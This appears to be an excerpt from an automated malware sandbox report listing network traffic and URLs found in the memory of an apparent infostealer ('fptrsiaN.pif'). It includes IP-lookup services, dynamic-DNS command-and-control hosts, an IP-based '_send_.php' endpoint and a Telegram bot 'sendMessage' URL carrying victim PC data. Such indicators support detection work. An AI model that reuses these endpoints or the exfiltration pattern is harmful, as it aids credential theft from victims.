          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 18 Feb 2025 19:06:52 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 18 Feb 2025 19:06:58 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
          Source: fptrsiaN.pif, 00000006.00000002.3000201227.000000001D40F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021EEC000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000311F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
          Source: fptrsiaN.pif, 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 00000006.00000003.1724265899.000000001B2EC000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.2996815062.000000001CE19000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3000473987.0000000021B19000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000003.1840988876.000000001FFCD000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000003.1916140937.000000002F0FD000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.2998810475.0000000030BC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
          Source: fptrsiaN.pif, 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 00000006.00000003.1724265899.000000001B2EC000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3000201227.000000001D2A1000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.2996815062.000000001CE19000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021D91000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3000473987.0000000021B19000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000003.1840988876.000000001FFCD000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000003.1916140937.000000002F0FD000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000310F1000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.2998810475.0000000030BC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
          Source: fptrsiaN.pif, 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 00000006.00000003.1724265899.000000001B2EC000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3000201227.000000001D2A1000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.2996815062.000000001CE19000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021D91000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3000473987.0000000021B19000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000003.1840988876.000000001FFCD000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000003.1916140937.000000002F0FD000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000310F1000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.2998810475.0000000030BC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
          Source: fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
          Source: fptrsiaN.pif, 00000006.00000002.3000201227.000000001D2A1000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021D91000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000310F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
          Source: fptrsiaN.pif, 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 00000006.00000003.1724265899.000000001B2EC000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.2996815062.000000001CE19000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3000473987.0000000021B19000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000003.1840988876.000000001FFCD000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000003.1916140937.000000002F0FD000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.2998810475.0000000030BC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
          Source: fptrsiaN.pif, 00000006.00000002.2987999528.000000001B358000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.2987999528.000000001B316000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.2987999528.000000001B2D5000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3000201227.000000001D41F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3000201227.000000001D42B000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3011468270.000000001F922000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.2999173712.0000000020036000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021F08000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021EFE000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3013384079.0000000024DE0000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000003.2430924168.0000000024E63000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000312A5000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.0000000031298000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3013802889.0000000033EC7000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.2997234899.000000002F111000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://e6.i.lencr.org/0
          Source: fptrsiaN.pif, 00000006.00000002.2987999528.000000001B358000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.2987999528.000000001B316000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.2987999528.000000001B2D5000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3000201227.000000001D41F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3000201227.000000001D42B000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3011468270.000000001F922000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.2999173712.0000000020036000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021F08000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021EFE000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3013384079.0000000024DE0000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000003.2430924168.0000000024E63000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000312A5000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.0000000031298000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3013802889.0000000033EC7000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.2997234899.000000002F111000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://e6.o.lencr.org0
          Source: fptrsiaN.pif, 00000006.00000002.3000201227.000000001D41F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3000201227.000000001D42B000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021F08000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021EEC000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000312A5000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.0000000031298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.irco.com.sa
          Source: fptrsiaN.pif, 00000006.00000002.3000201227.000000001D2A1000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021D91000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000310F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: fptrsiaN.pif, 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 00000006.00000003.1724265899.000000001B2EC000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3000201227.000000001D2A1000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.2996815062.000000001CE19000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021D91000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3000473987.0000000021B19000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000003.1840988876.000000001FFCD000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000003.1916140937.000000002F0FD000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000310F1000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.2998810475.0000000030BC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
          Source: x.exe, 00000001.00000003.1703545154.000000007EFE3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1702919299.000000007EFEF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1723017408.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000001.00000002.1751929327.00000000208AD000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1754307432.0000000021090000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000001.00000002.1751929327.00000000207D0000.00000004.00001000.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000000.1720302814.0000000000416000.00000002.00000001.01000000.00000007.sdmp, fptrsiaN.pif, 0000000A.00000000.1837230094.0000000000416000.00000002.00000001.01000000.00000007.sdmp, fptrsiaN.pif, 0000000F.00000000.1911866469.0000000000416000.00000002.00000001.01000000.00000007.sdmp, fptrsiaN.pif.1.drString found in binary or memory: http://www.pmail.com
          Source: fptrsiaN.pif, 00000006.00000002.2987999528.000000001B358000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.2987999528.000000001B316000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3000201227.000000001D41F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3000201227.000000001D42B000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3011468270.000000001F922000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.2999173712.0000000020036000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021F08000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021EFE000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3013384079.0000000024DE0000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000003.2430924168.0000000024E63000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000312A5000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.0000000031298000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3013802889.0000000033EC7000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000003.2480370892.0000000033F00000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.2997234899.000000002F111000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
          Source: fptrsiaN.pif, 0000000A.00000002.2999173712.0000000020036000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/
          Source: fptrsiaN.pif, 00000006.00000002.2987999528.000000001B358000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.2987999528.000000001B316000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3000201227.000000001D41F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3000201227.000000001D42B000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3011468270.000000001F922000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.2999173712.0000000020036000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021F08000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021EFE000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3013384079.0000000024DE0000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000003.2430924168.0000000024E63000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000312A5000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.0000000031298000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3013802889.0000000033EC7000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000003.2480370892.0000000033F00000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.2997234899.000000002F111000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
          Source: fptrsiaN.pif, 00000006.00000002.3003869712.000000001E626000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E5F4000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.00000000230E4000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000023116000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032476000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: fptrsiaN.pif, 00000006.00000002.3000201227.000000001D36F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021E45000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000311D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
          Source: fptrsiaN.pif, 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 00000006.00000003.1724265899.000000001B2EC000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3000201227.000000001D36F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.2996815062.000000001CE19000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021E45000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3000473987.0000000021B19000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000003.1840988876.000000001FFCD000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000003.1916140937.000000002F0FD000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.2998810475.0000000030BC9000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000311D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
          Source: fptrsiaN.pif, 00000006.00000002.3000201227.000000001D36F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021E45000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000311D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
          Source: fptrsiaN.pif, 00000006.00000002.3000201227.000000001D36F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021E45000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000311D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20a
          Source: fptrsiaN.pif, 00000006.00000002.3003869712.000000001E626000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E5F4000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.00000000230E4000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000023116000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032476000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: fptrsiaN.pif, 00000006.00000002.3003869712.000000001E626000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E5F4000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.00000000230E4000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000023116000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032476000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: fptrsiaN.pif, 00000006.00000002.3003869712.000000001E626000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E5F4000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.00000000230E4000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000023116000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032476000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021F2E000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021F5F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000312FB000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000311F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
          Source: fptrsiaN.pif, 00000006.00000002.3000201227.000000001D451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enLz
          Source: fptrsiaN.pif, 00000006.00000002.3003869712.000000001E626000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E5F4000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.00000000230E4000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000023116000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032476000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: fptrsiaN.pif, 00000006.00000002.3003869712.000000001E626000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E5F4000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.00000000230E4000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000023116000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032476000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: fptrsiaN.pif, 00000006.00000002.3003869712.000000001E626000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E5F4000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.00000000230E4000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000023116000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032476000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: fptrsiaN.pif, 00000006.00000002.3000201227.000000001D354000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3000201227.000000001D36F000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021E45000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000311AC000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000310F1000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000311D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
          Source: fptrsiaN.pif, 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 00000006.00000003.1724265899.000000001B2EC000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3000201227.000000001D2F0000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.2996815062.000000001CE19000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3000473987.0000000021B19000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021DE0000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000003.1840988876.000000001FFCD000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000003.1916140937.000000002F0FD000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000310F1000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.2998810475.0000000030BC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
          Source: fptrsiaN.pif, 0000000F.00000002.3001337682.00000000311D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
